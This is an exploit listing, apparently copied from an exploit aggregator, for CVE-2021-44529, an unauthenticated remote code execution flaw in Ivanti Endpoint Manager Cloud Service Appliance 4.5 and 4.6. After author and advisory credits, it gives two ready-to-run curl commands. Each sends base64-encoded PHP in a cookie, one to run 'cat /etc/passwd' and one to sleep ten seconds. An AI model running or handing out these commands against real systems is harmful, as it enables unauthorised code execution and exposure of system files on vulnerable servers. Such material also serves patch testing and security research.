Exploit for Ivanti Endpoint Manager CSA 4.5 / 4.6 Remote Code Execution CVE-2021-44529

Name: Exploit for Ivanti Endpoint Manager CSA 4.5 / 4.6 Remote Code Execution CVE-2021-44529
Rating: 5 (201 reviews)

2022-03-21 | CVSS 7.5

## https://sploitus.com/exploit?id=PACKETSTORM:166383
# Exploit Title: Ivanti Endpoint Manager - Cloud Service Appliance (Unauthenticated Remote Code Execution)   
# Date: 20/03/2022   
# Exploit Author: d7x   
# Vendor Homepage: https://www.ivanti.com/   
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6   
# Version: CSA 4.6 4.5 - EOF Aug 2021   
# Tested on: Linux x86_64 # CVE : CVE-2021-44529  
# CVE : CVE-2021-44529  
  
###  
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):   
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US  
  
Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies  
  
@d7x_real  
https://d7x.promiselabs.net  
https://www.promiselabs.net  
###  
  
# cat /etc/passwd  
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo  
  
# sleep for 10 seconds  
curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '<c123>\K.*?(?=</c123>)'; echo